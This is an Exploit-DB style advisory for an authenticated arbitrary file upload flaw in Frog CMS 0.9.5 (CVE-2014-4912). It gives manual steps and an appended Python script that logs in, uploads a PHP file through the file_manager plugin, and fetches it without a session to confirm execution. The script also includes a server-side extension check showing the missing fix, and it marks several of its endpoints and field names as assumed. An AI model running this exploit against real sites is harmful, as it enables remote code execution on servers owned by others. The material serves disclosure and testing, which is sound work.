Exploit Title: Arbitrary File Upload in Frog CMS 0.9.5
Date: 2014-07-07
Exploit Author: Javid Hussain
Vendor Homepage: http://www.madebyfrog.com

# Exploit-DB Note: All authenticated users can upload files. If the file
# does not have execute permissions, the CMS allows users to change them.
# No need to be authenticated to trigger uploaded files.

It is possible to upload an arbitrary file to the latest version of Frog CMS, 0.9.5.

POC:
The vulnerability exists because the file_manager plugin does not properly verify the extension of uploaded files.

1. Log in as any user and go to http://localhost/frog_095/admin/?/plugin/file_manager/images
2. Upload an executable PHP file.
3. Go to http://localhost/Frog/frog_095/public/images/ and request the uploaded file for verification; no session is needed for this step.
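The steps above in script form, as an added example that is not part of the original Exploit-DB entry or of Frog CMS itself. Only the admin and public/images URLs come from the advisory; the login and upload endpoints and the form field names (LOGIN_URL, UPLOAD_URL, LOGIN_FIELDS, UPLOAD_FIELD, PATH_FIELD) are assumptions that must be confirmed against the live admin HTML. The block also carries the server-side check the plugin lacks (upload_allowed), so the weak behaviour and the fix can be compared side by side.

```python
"""Frog CMS 0.9.5 file_manager upload PoC plus the missing extension check.
Added example; endpoint paths and field names marked ASSUMED are not from
the advisory and must be verified before use."""
import http.cookiejar
import os
import urllib.parse
import urllib.request
import uuid

BASE = "http://localhost/frog_095"                          # from the advisory
LOGIN_URL = BASE + "/admin/?/login/login"                   # ASSUMED endpoint
UPLOAD_URL = BASE + "/admin/?/plugin/file_manager/upload"   # ASSUMED endpoint
PUBLIC_IMAGES = BASE + "/public/images/"                    # from the advisory
LOGIN_FIELDS = ("login[username]", "login[password]")       # ASSUMED field names
UPLOAD_FIELD, PATH_FIELD = "upload_file", "path"            # ASSUMED field names

MARKER = "frog-upload-poc"
# Constructed payload: echoes a marker so execution can be confirmed without a session.
PAYLOAD = ("<?php echo '%s'; ?>" % MARKER).encode()


def build_multipart(fields, file_field, filename, content):
    """Build a multipart/form-data body; returns (body_bytes, content_type)."""
    boundary = "----poc" + uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts.append(('--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n'
                      % (boundary, name, value)).encode())
    parts.append(('--%s\r\nContent-Disposition: form-data; name="%s"; filename="%s"\r\n'
                  "Content-Type: application/octet-stream\r\n\r\n"
                  % (boundary, file_field, filename)).encode())
    parts.append(content + b"\r\n")
    parts.append(("--%s--\r\n" % boundary).encode())
    return b"".join(parts), "multipart/form-data; boundary=" + boundary


def run_poc(username, password, filename="poc.php"):
    """Authenticate, upload PAYLOAD into public/images, then fetch it anonymously.
    Returns True when the PHP marker is served back, i.e. the file executed."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    # 1. Any account will do: the advisory states every authenticated user may upload.
    login = urllib.parse.urlencode({LOGIN_FIELDS[0]: username,
                                    LOGIN_FIELDS[1]: password}).encode()
    opener.open(LOGIN_URL, login).read()
    # 2. Upload the PHP file through the file manager into the images directory.
    body, ctype = build_multipart({PATH_FIELD: "images"}, UPLOAD_FIELD, filename, PAYLOAD)
    req = urllib.request.Request(UPLOAD_URL, body, {"Content-Type": ctype})
    opener.open(req).read()
    # 3. Fetch with a fresh, cookie-less client: no authentication is needed here.
    page = urllib.request.urlopen(PUBLIC_IMAGES + filename).read().decode(errors="replace")
    return MARKER in page


SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
IMAGE_ALLOWLIST = {"jpg", "jpeg", "png", "gif"}


def upload_allowed(filename, allowlist=IMAGE_ALLOWLIST):
    """The check the plugin should perform before writing the file.
    Final extension must be in the allowlist, and no script extension may appear
    in any earlier dotted segment: Apache's AddHandler matches every segment, so
    'shell.php.jpg' would still be executed on a misconfigured host."""
    name = os.path.basename(filename).lower()
    segments = name.split(".")
    if len(segments) < 2 or not segments[0]:      # no extension, or dotfile (.htaccess)
        return False
    if segments[-1] not in allowlist:
        return False
    return not any(seg in SCRIPT_EXTS for seg in segments[1:-1])


if __name__ == "__main__":
    import sys
    user, pw = sys.argv[1], sys.argv[2]
    print("executed" if run_poc(user, pw) else "not executed")
```

Run it as `python3 poc.py <user> <password>` against a test instance only. Note that the PoC relies on mod_php (or a handler) being bound to .php in public/images; the "change permissions" note in the Exploit-DB header only matters for CGI-style execution.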
CVE: CVE-2014-4912
OSVDB: 108949
Related Exploit-DB entries for Frog CMS 0.9.5:
2009-12-13  Frog CMS 0.9.5 - Cross-Site Request Forgery (Milos Zivanovic)
2010-07-11  Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities (10n1z3d)
2010-11-25  Frog CMS 0.9.5 - Multiple Vulnerabilities (High-Tech Bridge SA)